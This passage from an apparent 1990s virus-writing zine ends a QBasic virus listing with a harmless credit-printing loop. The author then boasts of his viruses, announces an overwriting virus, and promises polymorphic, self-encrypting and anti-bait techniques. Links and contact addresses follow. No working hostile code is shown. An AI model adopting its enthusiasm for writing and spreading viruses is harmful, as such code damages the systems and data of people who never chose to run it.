DELAY 2IF KEY$ <> "" THEN COLOR 7: PRINT "CREATED BY ME (phr0ck OF COURSE, IN KEW BEEE!!!!": DELAY 2LOOP

END SUB

[End Cut!]

-=[HRM]=-

I havent much to say about membrain, only that it is the best so far. heh. later i promise to make BASIC virii 10x much better. Like:

Non_Overwriting virii Polymorphic Engine (slow/fast) Self-Encryption Anti-Bait\Goat Techniques Kamaikaze (TM) Technique

And a whole other load of shit that will make you Qb coders cream you filthy lingre! With an out going word i want to announce virii in the making. I have another done already. The CYB3X Virus by phr0q which whoops ass because it has a non-destructive payload but *IS* an overwriter. Nice payload trust me. like taking LCD ('CID) and also the CyberNinja series and a LOT more@!#$

nugz owns

-=[Links]=-

members.tripod.com/phr0q/text phr0q.com/membrain/ tlsecurity.com b4b0.org

-=[Last Words]=-

if you want criticism on your qb viruses please check out my sec- tion of the site: phr0q.com/virii/basvir.txt for the critism on that one horrid virus made by some lcd induced hippy and by the way PLEASE AND DOUBLE PLEASE mail me at phr0q@budlight.com or phr0q@ minister.com for any comments plez. Thank you. Ideas and comments will be appreciated. Virii..

All boys will be seduced BASICally by the grandmaster of BASIC viruses and worms and what not: (dont forget logic bombs too!)